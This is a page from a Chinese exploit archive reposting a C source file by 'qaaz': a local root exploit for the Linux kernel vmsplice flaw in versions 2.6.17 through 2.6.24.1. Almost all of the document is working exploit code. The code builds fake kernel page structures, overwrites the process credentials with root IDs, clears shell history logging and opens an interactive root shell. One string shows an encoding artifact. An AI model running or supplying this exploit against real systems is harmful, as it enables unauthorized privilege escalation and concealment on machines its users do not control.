首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit
来源:www.vfocus.net 作者:qaaz 发布时间:2008-02-20  
/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remeber original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 * 
 * -static -Wno-format  
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint  unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
 unsigned long flags;
 int count;
 int mapcount;
 unsigned long private;
 void *mapping;
 unsigned long index;
 struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
 printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
 fflush(stdout);
 fflush(stderr);
 exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS  0x73
#define USER_SS  0x7b
#define USER_FL  0x246

static_inline
void exit_kernel()
{
 __asm__ __volatile__ (
 "movl %0, 0x10(%%esp) ;"
 "movl %1, 0x0c(%%esp) ;"
 "movl %2, 0x08(%%esp) ;"
 "movl %3, 0x04(%%esp) ;"
 "movl %4, 0x00(%%esp) ;"
 "iret"
 : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
     "i" (USER_CS), "r" (exit_code)
 );
}

static_inline
void * get_current()
{
 unsigned long curr;
 __asm__ __volatile__ (
 "movl %%esp, %%eax ;"
 "andl %1, %%eax ;"
 "movl (%%eax), %0"
 : "=r" (curr)
 : "i" (~8191)
 );
 return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS  0x23
#define USER_SS  0x2b
#define USER_FL  0x246

static_inline
void exit_kernel()
{
 __asm__ __volatile__ (
 "swapgs ;"
 "movq %0, 0x20(%%rsp) ;"
 "movq %1, 0x18(%%rsp) ;"
 "movq %2, 0x10(%%rsp) ;"
 "movq %3, 0x08(%%rsp) ;"
 "movq %4, 0x00(%%rsp) ;"
 "iretq"
 : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
     "i" (USER_CS), "r" (exit_code)
 );
}

static_inline
void * get_current()
{
 unsigned long curr;
 __asm__ __volatile__ (
 "movq %%gs:(0), %0"
 : "=r" (curr)
 );
 return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
 long, _vmsplice,
 int, fd,
 struct iovec *, iov,
 unsigned long, nr_segs,
 unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
 int i;
 uint *p = get_current();

 for (i = 0; i < 1024-13; i++) {
  if (p[0] == uid && p[1] == uid &&
      p[2] == uid && p[3] == uid &&
      p[4] == gid && p[5] == gid &&
      p[6] == gid && p[7] == gid) {
   p[0] = p[1] = p[2] = p[3] = 0;
   p[4] = p[5] = p[6] = p[7] = 0;
   p = (uint *) ((char *)(p + 8) + sizeof(void *));
   p[0] = p[1] = p[2] = ~0;
   break;
  }
  p++;
 } 

 exit_kernel();
}

void exit_code()
{
 if (getuid() != 0)
  die("wtf", 0);

 printf("[+] root\n");
 putenv("HISTFILE=/dev/null");
 execl("/bin/bash", "bash", "-i", NULL);
 die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
 int  pi[2];
 size_t  map_size;
 char *  map_addr;
 struct iovec iov;
 struct page * pages[5];

 uid = getuid();
 gid = getgid();
 setresuid(uid, uid, uid);
 setresgid(gid, gid, gid);

 printf("-----------------------------------\n");
 printf(" Linux vmsplice Local Root Exploit\n");
 printf(" By qaaz\n");
 printf("-----------------------------------\n");

 if (!uid || !gid)
  die("!@#___FCKpd___0quot;, 0);

 /*****/
 pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
 pages[1] = pages[0] + 1;

 map_size = PAGE_SIZE;
 map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                 MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
 if (map_addr == MAP_FAILED)
  die("mmap", errno);

 memset(map_addr, 0, map_size);
 printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
 printf("[+] page: 0x%lx\n", pages[0]);
 printf("[+] page: 0x%lx\n", pages[1]);

 pages[0]->flags    = 1 << PG_compound;
 pages[0]->private  = (unsigned long) pages[0];
 pages[0]->count    = 1;
 pages[1]->lru.next = (long) kernel_code;

 /*****/
 pages[2] = *(void **) pages[0];
 pages[3] = pages[2] + 1;

 map_size = PAGE_SIZE;
 map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                 MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
 if (map_addr == MAP_FAILED)
  die("mmap", errno);

 memset(map_addr, 0, map_size);
 printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
 printf("[+] page: 0x%lx\n", pages[2]);
 printf("[+] page: 0x%lx\n", pages[3]);

 pages[2]->flags    = 1 << PG_compound;
 pages[2]->private  = (unsigned long) pages[2];
 pages[2]->count    = 1;
 pages[3]->lru.next = (long) kernel_code;

 /*****/
 pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
 map_size = PAGE_SIZE;
 map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                 MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
 if (map_addr == MAP_FAILED)
  die("mmap", errno);
 memset(map_addr, 0, map_size);
 printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
 printf("[+] page: 0x%lx\n", pages[4]);

 /*****/
 map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
 map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
 if (map_addr == MAP_FAILED)
  die("mmap", errno);

 memset(map_addr, 0, map_size);
 printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

 /*****/
 map_size -= 2 * PAGE_SIZE;
 if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
  die("munmap", errno);

 /*****/
 if (pipe(pi) < 0) die("pipe", errno);
 close(pi[0]);

 iov.iov_base = map_addr;
 iov.iov_len  = ULONG_MAX;

 signal(SIGPIPE, exit_code);
 _vmsplice(pi[1], &iov, 1, 0);
 die("vmsplice", errno);
 return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ourgame GLWorld 2.x hgs_startN
·Woltlab Burning Board 3.0.x Re
·X.Org xorg-server <= 1.1.1-48.
·PunBB <= 1.2.16 Blind Password
·Apple iPhoto 4.0.3 DPAP Server
·X.Org xorg-x11-xfs <= 1.0.2-3.
·sCssBoard (pwnpack) Multiple V
·MyServer 0.8.11 (204 No Conten
·DESlock+ <= 3.2.6 DLMFDISK.sys
·Rising Antivirus Online Scanne
·DESlock+ <= 3.2.6 local kernel
·DBHcms <= 1.1.4 Remote File In
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved